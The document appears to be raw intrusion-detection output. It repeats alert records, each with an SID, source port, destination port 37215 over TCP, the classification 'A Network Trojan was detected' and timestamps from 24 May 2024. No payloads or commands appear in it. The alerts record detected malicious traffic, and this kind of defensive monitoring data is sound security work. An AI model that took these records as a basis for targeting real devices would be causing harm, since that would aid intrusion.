              SID:2835222
              Source Port:41164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446874
              SID:2835222
              Source Port:32772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924227
              SID:2835222
              Source Port:33170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867947
              SID:2835222
              Source Port:46264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624097
              SID:2835222
              Source Port:43460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060695
              SID:2829579
              Source Port:53862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278810
              SID:2829579
              Source Port:46270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924212
              SID:2835222
              Source Port:32774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538109
              SID:2829579
              Source Port:40762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300308
              SID:2829579
              Source Port:51104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117331
              SID:2835222
              Source Port:42656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695725
              SID:2835222
              Source Port:50314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741184
              SID:2829579
              Source Port:48060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073478
              SID:2829579
              Source Port:48818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543611
              SID:2835222
              Source Port:59794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308755
              SID:2835222
              Source Port:50728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421008
              SID:2829579
              Source Port:43216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061620
              SID:2835222
              Source Port:46930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578035
              SID:2835222
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433413
              SID:2835222
              Source Port:37722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200780
              SID:2835222
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040720
              SID:2835222
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575364
              SID:2829579
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967366
              SID:2829579
              Source Port:56416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098203
              SID:2829579
              Source Port:48870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459639
              SID:2835222
              Source Port:45352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433393
              SID:2835222
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638243
              SID:2829579
              Source Port:55164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700418
              SID:2835222
              Source Port:51852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485930
              SID:2829579
              Source Port:53106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926454
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743153
              SID:2835222
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581825
              SID:2829579
              Source Port:34110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866354
              SID:2829579
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284251
              SID:2829579
              Source Port:38628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879310
              SID:2829579
              Source Port:39206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970959
              SID:2829579
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994035
              SID:2829579
              Source Port:40842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623593
              SID:2835222
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149013
              SID:2829579
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358470
              SID:2829579
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803124
              SID:2835222
              Source Port:47916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597908
              SID:2829579
              Source Port:55684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661152
              SID:2829579
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459905
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100742
              SID:2829579
              Source Port:55138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187051
              SID:2835222
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752717
              SID:2835222
              Source Port:35634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553140
              SID:2835222
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880783
              SID:2829579
              Source Port:36010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988403
              SID:2829579
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860094
              SID:2829579
              Source Port:57722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077626
              SID:2835222
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340832
              SID:2835222
              Source Port:52786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491522
              SID:2829579
              Source Port:33798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196893
              SID:2835222
              Source Port:38968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489319
              SID:2835222
              Source Port:33710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065695
              SID:2829579
              Source Port:56004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302982
              SID:2829579
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160444
              SID:2835222
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278267
              SID:2835222
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187560
              SID:2829579
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283014
              SID:2829579
              Source Port:36776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552369
              SID:2835222
              Source Port:57934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204419
              SID:2829579
              Source Port:40340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241920
              SID:2829579
              Source Port:53340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167346
              SID:2829579
              Source Port:39924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251717
              SID:2829579
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374476
              SID:2835222
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166395
              SID:2835222
              Source Port:44478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551773
              SID:2835222
              Source Port:45078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542900
              SID:2829579
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604814
              SID:2835222
              Source Port:33342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765004
              SID:2829579
              Source Port:60376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103470
              SID:2829579
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725349
              SID:2835222
              Source Port:45380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233593
              SID:2835222
              Source Port:57376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857856
              SID:2835222
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077978
              SID:2829579
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884547
              SID:2835222
              Source Port:34804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872382
              SID:2829579
              Source Port:38274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583918
              SID:2829579
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265845
              SID:2829579
              Source Port:37512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408078
              SID:2835222
              Source Port:46278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065640
              SID:2829579
              Source Port:51716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529813
              SID:2829579
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111912
              SID:2835222
              Source Port:55232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572615
              SID:2829579
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624799
              SID:2829579
              Source Port:45562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578808
              SID:2829579
              Source Port:39348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099594
              SID:2835222
              Source Port:40082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581798
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506067
              SID:2835222
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535519
              SID:2829579
              Source Port:40180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918464
              SID:2835222
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573471
              SID:2835222
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432238
              SID:2835222
              Source Port:34720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125502
              SID:2835222
              Source Port:53506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459889
              SID:2829579
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487466
              SID:2829579
              Source Port:60726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727362
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573907
              SID:2829579
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663530
              SID:2835222
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638184
              SID:2829579
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725692
              SID:2829579
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636016
              SID:2835222
              Source Port:53900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458411
              SID:2835222
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482908
              SID:2835222
              Source Port:33584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540722
              SID:2835222
              Source Port:41472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406419
              SID:2835222
              Source Port:57434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597880
              SID:2829579
              Source Port:46248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575149
              SID:2835222
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693165
              SID:2829579
              Source Port:45800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823606
              SID:2829579
              Source Port:36478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188102
              SID:2829579
              Source Port:37628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208872
              SID:2829579
              Source Port:43730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332378
              SID:2829579
              Source Port:44070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631841
              SID:2829579
              Source Port:52512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575180
              SID:2835222
              Source Port:46414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477355
              SID:2829579
              Source Port:36306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313606
              SID:2835222
              Source Port:54156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208265
              SID:2835222
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100957
              SID:2829579
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186088
              SID:2835222
              Source Port:56044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246099
              SID:2835222
              Source Port:55686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591727
              SID:2835222
              Source Port:45810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621583
              SID:2835222
              Source Port:60740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572743
              SID:2835222
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492368
              SID:2835222
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726410
              SID:2835222
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363268
              SID:2829579
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546959
              SID:2829579
              Source Port:45094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689594
              SID:2829579
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193891
              SID:2829579
              Source Port:47360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515578
              SID:2829579
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975453
              SID:2829579
              Source Port:45650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866475
              SID:2829579
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481820
              SID:2829579
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204763
              SID:2835222
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491822
              SID:2829579
              Source Port:35896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398412
              SID:2835222
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129715
              SID:2835222
              Source Port:45238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882814
              SID:2835222
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575288
              SID:2835222
              Source Port:40298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421574
              SID:2829579
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448830
              SID:2829579
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460432
              SID:2829579
              Source Port:45830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725714
              SID:2829579
              Source Port:44232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208365
              SID:2829579
              Source Port:35222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725098
              SID:2835222
              Source Port:54252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506250
              SID:2835222
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463082
              SID:2829579
              Source Port:44068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662571
              SID:2835222
              Source Port:35964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235434
              SID:2835222
              Source Port:47268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078677
              SID:2829579
              Source Port:32884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664582
              SID:2835222
              Source Port:51656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804684
              SID:2835222
              Source Port:47844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525798
              SID:2829579
              Source Port:47038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494784
              SID:2835222
              Source Port:39100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076924
              SID:2829579
              Source Port:36324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433606
              SID:2829579
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519524
              SID:2835222
              Source Port:52326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547030
              SID:2835222
              Source Port:35474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578864
              SID:2835222
              Source Port:36224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727268
              SID:2829579
              Source Port:46460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195125
              SID:2835222
              Source Port:44752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232800
              SID:2829579
              Source Port:60624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372028
              SID:2829579
              Source Port:48752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113711
              SID:2829579
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200699
              SID:2835222
              Source Port:35434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129694
              SID:2829579
              Source Port:37122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860009
              SID:2829579
              Source Port:55902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371943
              SID:2835222
              Source Port:49542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542211
              SID:2829579
              Source Port:52732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233930
              SID:2835222
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482826
              SID:2829579
              Source Port:40628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394480
              SID:2835222
              Source Port:59992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724734
              SID:2835222
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581661
              SID:2829579
              Source Port:41172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860026
              SID:2829579
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360873
              SID:2829579
              Source Port:49608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492296
              SID:2835222
              Source Port:58882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477118
              SID:2829579
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059762
              SID:2829579
              Source Port:43194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189499
              SID:2829579
              Source Port:52882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570556
              SID:2835222
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233905
              SID:2835222
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116011
              SID:2835222
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100795
              SID:2835222
              Source Port:42350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833265
              SID:2835222
              Source Port:41362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118427
              SID:2829579
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055319
              SID:2829579
              Source Port:37266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459710
              SID:2829579
              Source Port:34494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868671
              SID:2829579
              Source Port:45086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341168
              SID:2829579
              Source Port:34424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431397
              SID:2835222
              Source Port:41492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317948
              SID:2835222
              Source Port:44370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517462
              SID:2829579
              Source Port:36266
              Destination Port:37215
